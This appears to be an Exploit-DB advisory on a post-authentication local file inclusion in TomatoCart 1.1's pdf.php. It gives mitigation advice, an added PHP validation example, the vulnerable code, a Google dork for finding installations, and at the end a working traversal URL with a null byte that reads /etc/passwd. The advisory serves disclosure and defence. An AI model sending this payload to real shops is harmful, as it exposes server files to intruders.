Vendor: TomatoCart
By: brain[pillow]
CVSS: 7.5 (HIGH)
CWE: Local File Inclusion
Product Name: TomatoCart
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Platforms Tested:
2010

TomatoCart 1.1 PostAuth Local File Include

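The vulnerability allows a logged-in customer to include local files by manipulating the 'pdf' parameter of the '/pdf.php' script. The script concatenates the parameter into the path 'includes/modules/pdf/' . $pdf . '.php' without validation, so by specifying a relative path to a file, with a trailing null byte (%00) to cut off the appended '.php' suffix, the attacker can read sensitive information, such as the '/etc/passwd' file.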

Mitigation:

Apply the vendor-provided patch or upgrade to a newer version that addresses the vulnerability. Restrict access to the vulnerable script and sanitize user input to prevent directory traversal attacks.
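
One way to implement the input check recommended above for the 'pdf' parameter, shown as an added example (this is not TomatoCart code and not a vendor patch). The function name resolve_pdf_module, the module name 'invoice' and the temporary directory are assumptions made for the demonstration.

```php
<?php
// Added example, not TomatoCart code. resolve_pdf_module() is a hypothetical helper.

/**
 * Map a request-supplied module name to a file inside $baseDir,
 * or return null when the name is not acceptable.
 */
function resolve_pdf_module($name, string $baseDir): ?string
{
    // 1. Strict format check: letters, digits and underscore only.
    //    \A...\z anchors (not ^...$) so a trailing newline cannot slip through.
    //    This rejects '/', '.', NUL bytes and array input before a path is built.
    if (!is_string($name) || preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // 2. Canonicalise, then confirm the result is still inside the base directory
    //    (covers symlinks placed inside the module directory).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary module directory holding one module file.
$dir = sys_get_temp_dir() . '/pdf_modules_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/invoice.php', "<?php // constructed sample module\n");

// Constructed inputs: one valid name, then traversal, NUL byte, dotted name, array.
$inputs = ['invoice', '../../../etc/passwd', "../../../etc/passwd\0", 'invoice.php', ['x']];
foreach ($inputs as $in) {
    $shown = is_string($in) ? addcslashes($in, "\0..\37") : gettype($in);
    printf("%-28s => %s\n", $shown, resolve_pdf_module($in, $dir) ?? 'REJECTED');
}

unlink($dir . '/invoice.php');
rmdir($dir);
```

Only 'invoice' resolves to a path; every other input is rejected before include() would be reached. Because the validated name contains only word characters, the class name built from it ('toC_' . ucfirst($pdf) . '_PDF') is constrained as well.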

Exploit-DB raw data:

# Exploit Title: TomatoCart 1.1 PostAuth Local File Include
# Google Dork: "Powered by TomatoCart"
# Date: 25.10.2010
# Author: brain[pillow]
# Software Link: http://www.tomatocart.com/
# Version: 1.1

=========================================================
# Vuln. code:

if ($osC_Customer->isLoggedOn() === true) {

  if (isset($_REQUEST['module'])) {
    $module = $_REQUEST['module'];
    $osC_Language->load($module);
  }

  // 'pdf' is taken from the request without any validation
  if (isset($_REQUEST['pdf'])) {
    $pdf = $_REQUEST['pdf'];
  }

  if (!empty($module) && !empty($pdf)) {

    // the request-controlled $pdf is concatenated into the include path
    if (file_exists('includes/modules/pdf/' . $pdf . '.php')) {
      include('includes/modules/pdf/' . $pdf . '.php');

      $pdf_class = 'toC_' . ucfirst($pdf) . '_PDF';
      $object = new $pdf_class();
      $object->render();

      exit;
    }
  }
}

=========================================================
# Exploit:

/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00